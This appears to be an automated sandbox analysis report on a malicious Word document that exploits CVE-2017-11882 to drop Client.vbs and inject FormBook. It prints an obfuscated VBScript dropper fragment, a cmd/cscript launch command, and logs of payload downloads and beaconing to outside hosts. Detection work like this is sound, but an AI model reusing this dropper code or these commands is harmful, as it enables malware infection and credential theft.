          Source: WINWORD.EXE, 00000000.00000002.571818329.0000000004430000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.576540288.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: cscript.exe, 00000005.00000002.420189170.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.517376930.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000C.00000000.515274931.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000C.00000000.515274931.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: WINWORD.EXE, 00000000.00000002.571818329.0000000004430000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.576540288.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000C.00000000.515274931.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000C.00000000.516222538.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BDFCFD8E-5D0B-4E49-95FE-9EC3FCEBDEC2}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: google.com
          Source: global trafficHTTP traffic detected: GET /attachments/915347845752705109/915799800740462662/mono.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /t3t2/?YTX8m6=X/AHJ1G8CzET27bRNAkcy2zo056pG+X2bUgtrIM6Usdw2LVzhx3zymRQr/cABPSK+z/Wow==&GZS=5jiXYnvXE6 HTTP/1.1Host: www.eminkoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: explorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695505990.0000000000230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.493675767.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695460861.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.533315726.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.523205518.0000000007F69000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695385145.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.493359137.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.533246688.0000000000290000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Document contains OLE streams which likely are hidden ActiveX objectsShow sources
          Source: ~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp.0.drStream path '_1699975273/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Pat
          Malicious sample detected (through community Yara rule)Show sources
          Source: 11.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.695505990.0000000000230000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.695505990.0000000000230000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.493675767.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.493675767.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.695460861.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.695460861.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.533315726.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.533315726.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.523205518.0000000007F69000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.523205518.0000000007F69000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.695385145.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.695385145.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.493359137.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.493359137.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.533246688.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.533246688.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
          Document contains OLE streams with names of living off the land binariesShow sources
          Source: ~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp.0.drStream path '_1699975273/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Path\Client.vbs.. ..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..F0xCRC341414141 = E0xCRC341414141( Join (TristateUseDefault0xCRC341414141,""))..End Function........Function G0xCRC341414141()..G0xCRC341414141 = "\toor\.\\!}etanosrepmi=leveL"..End Function........Function H0xCRC341414141()..H0xCRC341414141 = "noitanosrepmi{:stmgmniw"..End Function........Function I0xCRC341414141()..I0xCRC341414141 = E0xCRC341414141 ("putratSssecorP_23niW")..End Function........Function J0xCRC341414141()..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..J0xCRC341414141 = "hsre"..End Function........D0xCRC341414141()........Function E0xCRC341414141(str)..If Left(g_DumpDir,2) <> "\\" Then..DriveName = Left(g_DumpDir,1)..Else..strAux = Right(g_DumpDir, Len(g_DumpDir) - 2)..arrAux = Split(strAux, "\", -1) ..DriveName = "\\" & arrAux(0) & "\" & arrAux(1)..End If..Length = 8..objArgs = 5..If Length = objArgs Then..Else..GetStringArray = Len(str)..a = Left(str,1)..For i = 1 To GetStringArray..arrStrings = Eval("Lef" + "t(s" + "tr,i)")..If Len(arrStrings)> 1 Then..strSeparator = Right(arrStrings,1) & strTemp..strTemp = strSeparator ..End If..Next..E0xCRC341414141 = strTemp & a..End If..End Function........Sub B0xCRC341414141(CO0xCRC341414141)..Set ProductData0xCRC341414141 = GetObject (SPLevel0xCRC341414141 + "CiMv2")..Set ConvertToKey0xCRC341414141 = ProductData0xCRC341414141.Get (I0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Set KeyOffset0xCRC341414141 = ConvertToKey0xCRC341414141.SpawnInstance_..KeyOffset0xCRC341414141.ShowWindow = 0..Execute("SeT Data0xCRC341414141 = ProductData0xCRC341414141.Get (""WiN32_PrOceSs"")")..Set isWin80xCRC341414141 = Da
          Source: ~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp.0.drStream path '_1699975275/Equation Native' : ..................\...[.............ZZCmD.exe /C cscript %tmp%\Client.vbs A..C................................................................................................................
          Very long command line foundShow sources
          Source: unknownProcess created: Commandline size = 4039
          Microsoft Office drops suspicious filesShow sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.vbsJump to behavior
          Found suspicious RTF objectsShow sources
          Source: Client.vbsStatic RTF information: Object: 0 Offset: 000011FEh Client.vbs
          Source: ~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00401030
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041DA19
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041E23C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041EB64
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041DCEB
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00402D90
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041D5A6
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409E60
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041DE6B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041EE96
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041DFEA
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00402FB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041E7B4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007C905A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007B3040
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007DD005
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007AE0C6
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007AE2E9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00851238
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007FA37B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007B7353
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007B2305
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007D63DB
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007AF3CF
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007C1489
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007E5485
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007B351F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007CC5F0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00852622
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007BE6C1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007B4680
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0083579A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007E57C3
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007BC7BC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007D286D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007BC85C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0084F8EE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0085098E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007C69FE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007B29B2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00835955
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00863A83
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0085CBA4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0083DBDA
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007D7B00
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007AFBD7
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007BCD5B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007E0D3B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0084FDDD
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007CEE4C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007E2E2F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007DDF7C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007C0F3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_02001238
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F5E0C6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F7905A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F63040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F8D005
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F863DB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F5F3CF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01FAA37B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F67353
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F62305
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F5E2E9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F7C5F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_02002622
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01FA6540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F6351F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F95485
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F71489
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F9D47D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F957C3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F6C7BC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01FE579A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F6E6C1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F64680
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F769FE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F629B2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_02013A83
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01FE5955
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01FFF8EE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F8286D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0200CBA4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F6C85C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F5FBD7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01FEDBDA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F87B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0200098E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01FFFDDD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F6CD5B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F90D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F8DF7C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F70F3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F7EE4C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F92E2F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009D5A6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009E7B4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009DA19
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009EB64
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009DCEB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_00082D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009DE6B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_00089E60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009EE96
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_00082FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E4A036
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E48912
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E41082
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E45B30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E45B32
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E4B232
          Source: ~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeMemory allocated: 76E90000 page execute and read and write
          Source: 11.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.574618349.0000000005C40000.00000004.00000001.sdmp, type: MEMORYMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
          Source: 0000000D.00000002.695505990.0000000000230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.695505990.0000000000230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.493675767.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.493675767.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
